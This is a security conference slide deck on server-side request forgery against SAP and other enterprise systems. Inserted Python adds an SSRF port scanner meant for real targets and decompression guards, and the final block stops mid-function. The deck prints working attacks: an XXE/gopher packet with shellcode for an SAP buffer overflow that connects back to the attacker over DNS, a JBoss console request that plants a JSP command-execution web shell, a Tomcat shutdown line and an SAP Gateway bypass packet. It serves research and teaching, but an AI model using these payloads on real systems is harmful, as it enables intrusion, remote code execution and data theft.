Invest in security to secure investments

SSRF vs. business-critical applications
Part 2: New vectors and connect-back attacks

Alexander Polyakov – CTO at ERPScan

About ERPScan

• The only 360-degree SAP security solution – ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

Agenda

• Enterprise applications
• SSRF
  – History
  – Types
• SSRF proxy attacks
  – Example of attacking SAP with SSRF
• SSRF connect-back attacks
  – Examples
• XXE Scanner
• Conclusion

Enterprise applications: Definitions

Business software is generally any software that helps a business to increase its efficiency or measure its performance.

• Small (MS Office)
• Medium (CRM, shops)
• Enterprise (ERP, BW…)

Why are they critical?

• Any information an attacker might want, be it a cybercriminal, industrial spy or competitor, is stored in the corporate ERP. This information can include financial, customer or public relations data, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effective if targeted at the victim's ERP system, and they can cause significant damage to the business.

Business-critical systems architecture

• Located in a secure subnetwork
• Secured by firewalls
• Monitored by IDS systems
• Regularly patched

Noahhh…

But let's assume that they are, because it will be much more interesting to attack them.

Secure corporate network
[Diagram: the Internet, the corporate network, the ERP network and the industrial network drawn as isolated segments]

But wait. There must be some links!

Real corporate network
[Diagram: the same segments (the Internet, corporate network, ERP network, industrial network), now connected by links]

And… attackers can use them!

Corporate network attack scenario
[Diagram: an attack path from the Internet through the corporate network into the ERP and industrial networks]

But how?

SSRF

Supa Sexy Robo Fashion

SSRF history: the beginning

• SSRF: Server Side Request Forgery.
• An attack which was discussed in 2008 with very little information about theory and practical examples.
• Like any new term, SSRF doesn't show us something completely new like a new type of vulnerability. SSRF-style attacks were known before.

SSRF history: Basics

• We send Packet A to Service A
• Service A initiates Packet B to Service B
• Services can be on the same host or on different hosts
• We can manipulate some fields of Packet B within Packet A
• Various SSRF attacks depend on how many fields we can control in Packet B

[Diagram: Packet A goes from the attacker to Service A; Service A sends Packet B to Service B]

SSRF history

• Deral Heiland – Shmoocon 2008
  – Web Portals: Gateway To Information Or A Hole In Our Perimeter Defenses
• SpiderLabs 2012
  – http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html
• Vorontsov 2012
  – SSRF via XXE
    http://2012.caro.org/presentations/attacks-on-large-modern-web-applications
• ERPScan (Polyakov, Chastuchin) – SSRF vs business-critical applications (Gopher protocol), August 2012
  – http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf

SSRF history

• ssrfsocks by iamultra: a tool for ERPScan's vulnerability in Gopher
  – https://github.com/iamultra/ssrfsocks, August 2012
• Less Known Web App Vulnerabilities: Real World Examples (from the ERPScan paper), October 2012
• ERPScan – Gopher SSRF in JVM advisory, October 2012
  – http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/
• ERPScan (Polyakov) – SSRF 2.0
  – http://erpscan.com/category/publications/
• New research will be published at ZeroNights
  http://2012.zeronights.org/

Ideal SSRF

The idea is to find victim server interfaces that will allow sending packets initiated by the victim server to the localhost interface of the victim server or to another server secured by a firewall from outside. Ideally, this interface:

• Must allow sending any packet to any host and any port
• Must be accessible remotely without authentication

Why?

In this research, we wanted to:

• Collect the information about SSRF attacks
• Categorize them
• Show examples of SSRF attacks
• Show new potential and real SSRF vectors

SSRF

[Diagram: SSRF splits into SSRF proxy attacks (Trusted SSRF; Remote SSRF, which is Simple, Partial or Full) and SSRF back-connect attacks (Local SSRF; SSRF counter-attack)]

SSRF proxy attack

[Diagram: Packet A goes from the attacker into the corporate network; the server there forwards Packet B into the secure network]

SSRF back-connect attack

[Diagram: Packet A goes to Server A; Server A sends Packet B out to the attacker; the attacker's reply, Packet C, comes back to Server A]

SSRF proxy attacks

• Trusted SSRF (can forge requests to remote services, but only to predefined ones)
• Remote SSRF (can forge requests to any remote IP and port)
  – Simple Remote SSRF (no control on the application level)
  – Partial Remote SSRF (control over some fields on the application level)
  – Full Remote SSRF (full control on the application level)

Exploiting SSRF

For every SSRF attack, there must be at least two vulnerabilities to successfully trigger the attack:

• First vulnerability
  – Functionality to create/use links (for trusted SSRF)
  – Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)
• Second vulnerability
  – Insecure link (for trusted SSRF)
  – Vulnerability in a service on Server B (for remote SSRF)
  – Vulnerability in a localhost service on Server A (for local SSRF)
  – Vulnerability in a client application on Server A (for back-connect SSRF)

Trusted SSRF

• Trusted SSRF in Oracle (database links)
  – SELECT * FROM myTable@HostB
  – EXECUTE Schema.Package.Procedure@HostB('Parameter')
• Trusted SSRF in MSSQL (linked servers)
  – SELECT * FROM OPENQUERY(HostB, 'SELECT @@version')
• Trusted SSRF in SAP NetWeaver
  – SM59 transaction (RFC destinations)
• Also Lotus Domino and others

Not so interesting…
First vulnerability (functionality on Server A)

• Unusual calls
• Multiprotocol calls (URI)
  – In engines (XML)
  – In applications
• UNC calls
• HTTP calls
• FTP calls
• LDAP calls
• SSH calls
• Other calls

Functionality on Server A: Unusual calls

• Remote port scan
  – SAP NetWeaver wsnavigator (SAP Notes 1394544, 871394)
  – SAP NetWeaver ipcpricing (SAP Note 1545883)
  – SAP BusinessObjects viewrpt (SAP Note 1583610)
• Remote password brute force
  – SAP NetWeaver (NDA)
• Other
  – Information disclosure by testing if a file or a directory exists
  – Timing attacks
  – Etc.

Very application-specific. Can be very interesting.
Example of unusual calls

• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable

/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetClient=&view=

Port scan via ipcpricing JSP

[Screenshots: the responses for a closed port, an HTTP port and a SAP port differ; that difference is the oracle for the scan]
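The scan above works by comparing Server A's answers, and the three screenshots are the oracle. As an added example (not ERPScan's tool and not code from the deck), here is a differential scanner in Python that calibrates on a port known to be closed and flags every port whose response fingerprint differs, so no vendor-specific response text has to be hard-coded. The probe path and parameter names are the ones on the page; `fake_send`, the host `sapserver.example` and the response bodies it returns are constructed stand-ins so the block runs offline.

```python
"""Differential port scan through an SSRF parameter (added example)."""
import hashlib
import re
from urllib.parse import urlencode

PROBE_PATH = "/ipcpricing/ui/BufferOverview.jsp"   # path and parameters from the page


def probe_url(base, server, port):
    """Build the probe URL exactly as on the page, with the target in server/port."""
    qs = urlencode({"server": server, "port": port,
                    "dispatcher": "", "targetClient": "", "view": ""})
    return f"{base}{PROBE_PATH}?{qs}"


def fingerprint(status, body, elapsed, slow_after=2.0):
    """Reduce one response to something comparable across ports.

    Digits are replaced because the page echoes the probed port back, which
    would otherwise make every response unique; the fast/slow split separates
    a quick refusal (closed) from a connect timeout (filtered)."""
    normalised = re.sub(rb"\d+", b"#", body)
    digest = hashlib.sha256(normalised).hexdigest()[:12]
    return (status, "slow" if elapsed >= slow_after else "fast", digest)


def ssrf_port_scan(send, base, server, ports, known_closed=1):
    """send(url) -> (http_status, body_bytes, seconds_elapsed).

    Calibrates on `known_closed` (assumed closed on the target) and returns
    {port: 'closed' | 'open/other'} for every requested port."""
    baseline = fingerprint(*send(probe_url(base, server, known_closed)))
    verdict = {}
    for port in ports:
        fp = fingerprint(*send(probe_url(base, server, port)))
        verdict[port] = "closed" if fp == baseline else "open/other"
    return verdict


# Constructed stand-in for Server A so the example runs offline; real bodies
# will look different, and only the difference between them matters.
_FAKE_OPEN = {
    80: b"<html>buffer overview: remote HTTP reply from port 80</html>",
    3300: b"<html>buffer overview: unexpected data from port 3300</html>",
}


def fake_send(url):
    """Hypothetical transport: 200 for the two 'open' ports, a fast 500 otherwise."""
    port = int(re.search(r"port=(\d+)", url).group(1))
    if port in _FAKE_OPEN:
        return 200, _FAKE_OPEN[port], 0.05
    return 500, b"java.net.ConnectException: Connection refused (port %d)" % port, 0.01


if __name__ == "__main__":
    print(ssrf_port_scan(fake_send, "http://sapserver.example",
                         "172.16.0.13", [22, 80, 3300, 31337]))
```

Against a real target, replace `fake_send` with a function that performs the GET and returns status, body and elapsed time. The calibration step is what keeps the scanner honest: an application that answers every port the same way will produce no differences, and an application that only differs in timing still shows up through the fast/slow bucket.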
  
Multiprotocol calls (in XML)

• XML seems to be the new TCP.
• Almost all big projects use XML-based data transfer.
• There are a lot of XML-based protocols with different options to call external resources and thus conduct SSRF attacks.
• There is at least one element type which fits almost all XML-based schemas. The type is xsd:anyURI.
• URIs also encompass URLs of other schemes (e.g., FTP, gopher, telnet), as well as URNs.
• Popular URIs: http:// ftp:// telnet:// …

Multiprotocol calls in XML

• XML
  – XML External Entity
  – XSD definition
• XML Encryption
• XML Signature
• WS-Policy
• WS-Security
• WS-Addressing
• XBRL
• OData (edmx)
  – OData external entity
  – Other
• BPEL
• StratML

XML Encryption

1. <xenc:AgreementMethod Algorithm="http://ServerB/">
2. <xenc:EncryptionProperty Target="http://ServerB/">
3. <xenc:CipherReference URI="http://ServerB/">
4. <xenc:DataReference URI="http://ServerB/">

Successfully tested

XML Signature

1. <Reference URI="http://ServerB/attack">

Successfully tested

WS-Addressing

1. <To xmlns="http://www.w3.org/2005/08/addressing">http://ServerB/</To>
2. <ReplyTo xmlns="http://www.w3.org/2005/08/addressing"><Address>http://ServerB/</Address></ReplyTo>

Successfully tested (0-day)

WS-Policy

1. <wsp:PolicyReference URI="http://ServerB/">

Not tested
WS-Security

1. <input message="blabla" wsa:Action="http://ServerB"/>
2. <output message="blabla" wsa:Action="http://ServerB"/>

Not tested

WS-Federation

1. <fed:Federation FederationID="http://ServerB/">
2. <fed:FederationInclude>http://ServerB/</fed:FederationInclude>
3. <fed:TokenIssuerName>http://ServerB/</fed:TokenIssuerName>
4. <mex:MetadataReference><wsa:Address>http://ServerB/</wsa:Address></mex:MetadataReference>

Not tested

XBRL

1. <xbrli:identifier scheme="http://ServerB/">
2. <link:roleType roleURI="http://ServerB/">

Not tested

OData (edmx)

The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.

http://www.odata.org/media/30002/OData%20CSDL%20Definition.html

No examples of edmx in the wild (new protocol)

OData

1. <edmx:Reference URI="http://ServerB/attack">
2. <edmx:AnnotationsReference URI="http://ServerB/attack">

Still no products for testing (0-day)

StratML

1. <stratml:Source>http://ServerB/</stratml:Source>

Not tested

SOAP

SOAPAction?

No examples

Multiprotocol calls in applications

Multiprotocol calls

Not so usual, but a potentially big area

• Oracle Database
  – UTL_TCP

UNC calls: threats

• Sure, you can call a UNC path if you have a universal URI
• But if there is no universal engine, you can search for UNC
• UNC calls can be used for:
  – conducting SMBRelay attacks
  – reading files from shared folders (open or trusted)
  – other vectors which will be discussed later

Check the SMBRelay Bible posts from http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0

UNC calls: applications

• SAP NetWeaver
  – From SAP web services (SAP Notes 1503579, 1498575)
  – From RFC functions (SAP Note 1554030)
  – From SAP transactions, reports (SAP Note 1583286)
• Oracle Database
  – Listener
  – Database commands such as ctxsys.context

And much more

UNC calls: applications

• MSSQL Database
• MySQL Database
• FTP servers
• IBM Lotus Domino controller
• VMware
• Anything that uses an XML engine

And much more

HTTP calls: threats

• Sure, you can call an HTTP path if you have a universal URI
• But if there is no universal engine, you can search for HTTP
• HTTP calls can be used for conducting a wide range of attacks on systems which are in one network with Server A:
  – DoS
  – Information disclosure
  – Unauthorized access (like invoker servlets)
  – Brute forcing (users/directories/pages)
  – Fingerprinting
  – etc.

Examples of HTTP attacks are beyond the current research

HTTP calls: applications

• SAP NetWeaver
  – Transactions
  – Reports
  – RFC commands
  – Portal portlets
  – Portal links
• Oracle Database
  – UTL_HTTP
• MSSQL Database
• PostgreSQL Database
• Anything that uses an XML engine

And much more

FTP calls: threats

• Sure, you can call an FTP path if you have a universal URI
• FTP is usually possible whenever HTTP is possible
• But if there is no universal engine, you can search for FTP
• FTP calls can be used to conduct a wide range of attacks on systems which are in one network with Server A:
  – DoS
  – Information disclosure
  – Unauthorized access (like invoker servlets)
  – Brute forcing (users/directories/pages)
  – Fingerprinting
  – etc.

Examples of FTP attacks are beyond the current research

FTP calls: applications

• SAP NetWeaver
  – Transactions
  – Reports
  – RFC commands
• Oracle Database
  – UTL_HTTP
• PostgreSQL Database
• Anything that uses an XML engine

And much more

Other calls

• ldap://
  – Brute-force logins
  – Information disclosure
• jar://
  – Information disclosure
• mailto:
• ssh2://
  – Brute-force logins
  – RCE?
• gopher://
  – XXE tunneling
• …

Just the most popular ones

Exploiting Gopher (example)

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
]>
<foo>&date;</foo>

What will happen??

XXE tunneling (example)

[Diagram: Server A (Portal or XI) at 192.168.0.1 receives Packet A from the attacker and opens a connection to Server B (ERP, HR, BW etc.) at 172.16.0.1, port 3300]

Packet A:

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
]>
<foo>&date;</foo>

[Screenshot: a listener on Server B (telnet 172.16.0.1 3300) receives AAAAAAAAAAAAA on port 3300]

XXE tunneling to buffer overflow (example)

• A buffer overflow vulnerability found by Virtual Forge in the ABAP kernel (fixed in SAP Note 1487330)
• Hard to exploit because it requires calling an RFC function which calls the kernel function
• But even such a complex attack can be exploited
• Get ready for the hardcore

XXE tunneling to buffer overflow (hint 1)

• Shellcode size is limited to 255 bytes (NAME parameter)
• As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory
• So we can use an egghunter
• Any shellcode can be uploaded

XXE tunneling to buffer overflow: Packet B

POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
Authorization: Basic U1FQKjowMjA3NTk3==
Host: company.com:80
User-Agent: ERPSCAN Pentesting tool v 0.2
Content-Type: text/xml; charset=utf-8
Cookie: sap-client=000
Content-Length: 2271

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-com:document:sap:rfc:functions"><HEAP_EGG>dsecdsechff‚4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</HEAP_EGG><NAME>&#186;&#255;&#255;&#206;&#060;&#102;&#129;&#202;&#255;&#015;&#066;&#082;&#106;&#067;&#088;&#205;&#046;&#060;&#005;&#090;&#116;&#239;&#184;&#100;&#115;&#101;&#099;&#139;&#250;&#175;&#117;&#234;&#175;&#117;&#231;&#255;&#231;&#144;&#144;&#144;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#158;&#14;&#190;&#171;DSEC&#094;&#023;&#012;&#001;&#252;&#049;&#043;&#001;&#212;&#083;&#242;&#000;&#018;&#058;&#071;&#000;&#250;&#047;&#057;&#016;&#076;&#255;&#084;&#000;&#001;&#002;&#000;&#000;&#226;&#020;&#095;&#000;&#064;&#000;&#000;&#000;&#097;&#125;&#088;&#016;&#115;&#167;&#113;&#002;&#117;&#218;&#157;&#000;&#004;&#128;&#069;&#000;&#082;&#089;&#012;&#016;&#235;&#004;&#235;&#002;&#134;&#027;&#198;&#000;&#255;&#255;&#233;&#077;&#255;&#255;&#255;&#255;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-ENV:Body></SOAP-ENV:Envelope>

XXE tunneling to buffer overflow (hint 2)

• The next step is to pack this Packet B into Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports URL encoding like HTTP
• It will also help us evade IDS systems

Packet A:

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
Content-Length: 7730

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://[URL-encoded Packet B]" >
]>
<foo>&date;</foo>

XXE tunneling to buffer overflow (result)

[Diagram: Server A on the Internet (SAP XI, http://company.com) receives Packet A and forwards Packet B over gopher to Server B in the DMZ (SAP ERP, 172.16.0.1), port 8000, WebRFC service. Packet B carries the shellcode with the DNS payload. Packet C, the command-and-control response to the attacker, leaves over the DNS protocol, which is allowed for outbound connections.]

Packet A:

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://[Packet B]" >
]>
<foo>&date;</foo>

Full control over the internal system through the Internet

So, you can only send one packet by gopher, but you can't control the session…

Hmm, actually, sometimes you can.

Session handling by SSRF (trick 1)

• Using gopher, it is possible to send multiple packets in one session. Just add them like this:
  – gopher://[packet1][packet2][packet3]…
  – But you must know the session ID, or use a protocol without a session ID, like telnet

Successfully tested for SAP Message Server parameter change
Session handling by SSRF (trick 2)

• Just theoretical
• Let's suppose that the session is handled by the IP and port of the client
• The first packet is sent from some random port, for example, 3000
• Collect info about the session from the response
• Construct the second packet (next time, the source port will be 3001, 3002… etc.)
• Send the second packet until the source port is 3000 again

Needs testing

Now let's talk about different SSRF attacks: when we attack the same host with SSRF

SSRF back-connect attack

• Local SSRF
  The idea is to initiate a connection to localhost services on Server A.
• Counter-attack
  The idea of this attack is to send Packet A to Server A. The service must take Packet B and send it to the attacker's Server C. Server C will make a malformed response to Server A and trigger a client-side vulnerability in the application.

Local SSRF

• The first example is local SSRF
• We try to attack localhost ports on the same server with SSRF
• There are a lot of ports listened on by the OS and applications at localhost, and usually they are less secure

Currently working on a database of the most interesting ports

But you want examples… OK, OK!

Local SSRF to Tomcat shutdown

• Tomcat management port 8005
• Open only for localhost
• gopher://localhost:8005/SHUTDOWN%0d%0a

Successfully exploitable (thanks to Alexey Sintsov)

Local SSRF to Oracle Listener

• Problem
  – An old vulnerability in the Oracle listener in set_log_file
  – Secured by LOCAL_OS_AUTHENTICATION in 10g
• Attack
  – A user with CONNECT privileges can run UTL_TCP functions
  – Using UTL_TCP, it is possible to construct any TCP packet and send it to the listener
  – The connection will be from a local IP, so we bypass the LOCAL_OS_AUTHENTICATION restrictions

Tested in early 2008

Local SSRF to JBoss console

• JBoss management console service
• Even with a simple HTTP request
• Open only for localhost

http://localhost:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True

(arg3 is a URL-encoded JSP page that passes the comment request parameter to Runtime.getRuntime().exec(); DeploymentFileRepository.store writes it to shell.war/shell.jsp.)

Thanks to Alexey Sintsov for the sploit

Bypass SAP security restrictions

• It is possible to bypass many SAP security restrictions based on ACLs
  – SAP Gateway
  – SAP Message Server
  – Other remote services

Gateway example:

gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE

Counter-attack SSRF

• This is the most interesting way to use SSRF, which was not discussed before.
• We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an application on Server A.
• Some other interesting attacks are also possible.

New life for client-side bugs

Counter-attack on SMB client

• DoS by reading huge files remotely
• SMBRelay
• RCE v��ulnerabilities in the SMB client
  – MS10-006
  – MS10-020
  – MS11-019
  – MS11-043

Looking for a working example of a client-side bug

Counter-attack on FTP client

• Memory corruption vulnerabilities in FTP clients
  – Some examples: https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/
• Client path traversal
  – Those types of vulnerabilities are rare nowadays, but there are some chances to find them in industrial systems because they were created a long time ago.

Working on real examples

Counter-attack on HTTP client

The most widespread type of SSRF requests is HTTP. It means that vulnerabilities in embedded HTTP clients (which are used by different XML engines, for example) are the most sought-after part of our future research.
   –  DoS by multiple entities with links to big data
   –  DoS by multiple GZIP bombs

80

Working on real examples
  
Counter-attack on JAR parser

XML engines support the jar: scheme. When a URL with this scheme is called, the JAR parser opens a remote archive and takes a file from it. If there is a file parsing vulnerability in the JAR parser, it will be possible to attack the server.

•  Directory traversal
   –  Tested: JDK jar parser – not vulnerable
•  Jar bombs

81

Working on real examples
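Slide 80's GZIP-bomb item and slide 81's jar-bomb and directory-traversal items are the same defect seen from the client side: the embedded client trusts the remote server's declared sizes and entry names. The following is an added example written for this page, not code from the deck or from any JDK or XML engine, of the limits a hardened client applies: inflate a gzip body under a hard output cap, vet a jar's central directory for traversal names and bomb-like ratios before extracting anything, and count real bytes while extracting a member. The gzip bodies and jars are constructed inside build_samples().

```python
"""Size and path limits for content an embedded HTTP/JAR client pulls from a remote host."""
import gzip
import io
import posixpath
import re
import zipfile
import zlib


class DecompressionLimit(Exception):
    """Raised when decompressed output would exceed the configured budget."""


def gunzip_bounded(data: bytes, max_out: int) -> bytes:
    """Inflate a gzip body but never materialise more than max_out bytes.

    decompressobj.decompress(chunk, max_length) stops once max_length output
    bytes are ready and parks the rest of the input in unconsumed_tail, so a
    few-kilobyte gzip bomb is refused after max_out+1 bytes instead of
    exhausting memory.
    """
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+: expect a gzip header
    out = bytearray()
    chunk = data
    while chunk:
        out += d.decompress(chunk, max_out - len(out) + 1)
        if len(out) > max_out:
            raise DecompressionLimit(f"gzip output exceeds {max_out} bytes")
        chunk = d.unconsumed_tail
    if not d.eof:
        raise ValueError("truncated gzip stream")
    return bytes(out)


_DRIVE = re.compile(r"^[A-Za-z]:")


def safe_entry_name(name: str) -> bool:
    """True if a zip member name cannot escape the extraction directory."""
    norm = posixpath.normpath(name.replace("\\", "/"))
    return not (posixpath.isabs(norm) or norm == ".." or norm.startswith("../")
                or _DRIVE.match(norm) or "\x00" in name)


def check_jar(data: bytes, max_total_out: int, max_ratio: int = 100,
              max_entries: int = 10_000) -> list:
    """Cheap pre-extraction gate for a jar fetched over the network.

    Uses the central directory only: rejects traversal names, too many members,
    a declared total above max_total_out, and any member whose declared
    compression ratio looks like a bomb. Declared sizes can lie, so
    read_member_bounded() still counts real output when extracting.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        if len(infos) > max_entries:
            raise DecompressionLimit(f"{len(infos)} entries > {max_entries}")
        total = 0
        for info in infos:
            if not safe_entry_name(info.filename):
                raise ValueError(f"unsafe entry name: {info.filename!r}")
            total += info.file_size
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                raise DecompressionLimit(f"suspicious ratio for {info.filename!r}")
        if total > max_total_out:
            raise DecompressionLimit(f"declared total {total} > {max_total_out}")
        return [i.filename for i in infos]


def read_member_bounded(data: bytes, name: str, max_out: int) -> bytes:
    """Extract one member, inflating lazily and refusing output past max_out."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as f:
        out = f.read(max_out + 1)   # ZipExtFile inflates only what is requested
        if len(out) > max_out:
            raise DecompressionLimit(f"{name!r} exceeds {max_out} bytes")
        return out


def build_samples():
    """Constructed test data (made here, not captured from any system): a benign
    gzip body, a gzip bomb, a clean jar, a traversal jar and a jar bomb."""
    good_gz = gzip.compress(b'{"status":"ok"}')
    bomb_gz = gzip.compress(b"\x00" * (8 * 1024 * 1024))   # ~8 KB in, 8 MiB out

    def jar(entries):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            for name, payload in entries:
                zf.writestr(name, payload, compress_type=zipfile.ZIP_DEFLATED)
        return buf.getvalue()

    clean_jar = jar([("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n"),
                     ("com/example/App.class", b"\xca\xfe\xba\xbe" + bytes(64))])
    traversal_jar = jar([("../../evil.txt", b"x")])
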